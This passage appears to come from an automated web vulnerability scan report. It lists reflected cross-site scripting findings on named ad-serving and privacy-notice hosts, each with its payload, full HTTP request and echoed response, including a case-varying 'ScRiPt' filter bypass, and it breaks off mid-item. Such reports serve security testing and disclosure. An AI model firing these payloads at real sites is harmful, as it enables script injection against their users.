Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6
|
Response
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:42:01 GMT
Etag: "5c7333cf004a2bbfe1f6d26ba5911f5ba91d6b40"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6%00d77c2<a>11e0dd2ac6e; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/
Content-Length: 206
Connection: keep-alive
meteor.json_query_callback({"parent_id": "", "id": "9Lm6uVSxV_u", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6\\x00d77c2\\x3Ca\\x3E11e0dd2ac6e"}, 0);9af12<script>alert(1)</script>c3b46f05e43 |
4.97. http://choices.truste.com/ca [c parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://choices.truste.com |
| Path: |
/ca |
Issue detail
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 91d0b<script>alert(1)</script>b9789a4c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont1291d0b<script>alert(1)</script>b9789a4c38&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
|
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:33:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-itl",iconSpanId:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont1291d0b<script>alert(1)</script>b9789a4c38",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_62adc6f1_e43b_47bc_8db1_bcd5cb5ff449_ib,interstitialWidth:728,interstitialHei
...[SNIP]...
|
4.98. http://choices.truste.com/ca [cid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://choices.truste.com |
| Path: |
/ca |
Issue detail
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
|
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:33:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5821
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&w=728&h=90" target="_blank">
...[SNIP]...
|
4.99. http://choices.truste.com/ca [iplc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://choices.truste.com |
| Path: |
/ca |
Issue detail
The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload b2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce was submitted in the iplc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
|
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:36:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
cdd_eaa0_4b10_9820_b0aa6f5cb790_bi={baseName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790",anchName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-anch",width:728,height:90,ox:0,oy:0,plc:"tr",iplc:"ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce",intDivName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-itl",iconSpanId:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02con
...[SNIP]...
|
4.100. http://choices.truste.com/ca [plc parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://choices.truste.com |
| Path: |
/ca |
Issue detail
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
|
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_651da5c8_906d_4ecd_9ea4_8e2426759de9_bi={baseName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9",anchName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-anch",width:728,height:90,ox:0,oy:0,plc:"tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829",iplc:"ctr",intDivName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-itl",iconSpanId:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI
...[SNIP]...
|
4.101. http://choices.truste.com/ca [zi parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://choices.truste.com |
| Path: |
/ca |
Issue detail
The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c was submitted in the zi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
|
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
om/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",icon_cam_mo:"http://choices.truste.com/assets/ad_choices_en.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c",cam:"2",cid:"0511wl728x90",optoutLink:"http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90&w=728&h=90",target:"over"};
truste.ca.bindingInitMap[te_clr1_8
...[SNIP]...
|
4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/bar/v16-507/d3/jsc/fm.js |
Issue detail
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57523'%3balert(1)//761ebfa4333 was submitted in the $ parameter. This input was echoed as 57523';alert(1)//761ebfa4333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x9057523'%3balert(1)//761ebfa4333&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=91:90:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2676
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';z="+Math.random();}
if(zzuid=='
...[SNIP]...
|
4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/bar/v16-507/d3/jsc/fm.js |
Issue detail
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cd0e"-alert(1)-"31d922bac00 was submitted in the $ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x902cd0e"-alert(1)-"31d922bac00&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=89:88:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2754
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";z="+Math.random();}
if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';
var zzhasAd=undefined;
...[SNIP]...
|
4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/bar/v16-507/d3/jsc/fm.js |
Issue detail
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82c2'%3balert(1)//7d572232822 was submitted in the q parameter. This input was echoed as c82c2';alert(1)//7d572232822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=c82c2'%3balert(1)//7d572232822&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Response
